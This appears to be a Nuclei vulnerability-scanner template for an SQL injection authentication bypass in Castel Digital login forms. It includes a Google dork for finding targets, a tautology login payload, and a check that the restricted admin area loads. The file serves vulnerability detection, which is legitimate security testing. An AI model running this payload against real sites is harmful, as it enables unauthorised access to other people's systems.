id: castel-digital-sqli

info:
  name: Castel Digital - Authentication Bypass
  author: Kazgangap
  severity: high
  description: |
    SQL Injection vulnerability in Castel Digital login forms.
  reference:
    - https://www.casteldigital.com.br/
    - https://cxsecurity.com/issue/WLB-2024050032
  metadata:
    verified: true
    max-request: 2
    google-query: "Castel Digital"
  tags: sqli,auth-bypass,castel

http:
  - raw:
      - |
        POST /restrito/login/sub/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x

      - |
        GET /restrito/ HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "Banner"
          - "Construtoras"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009399703ddcd6b6b00c51d1178d3efc64bbd3355a8ff277d1c069aa981678424a022071a5445e9dca1b5ecfe620dccdc38a47e3fb75f4ea8ccbbd1668ff108c722b75:922c64590222798bb761d5b6d8e72950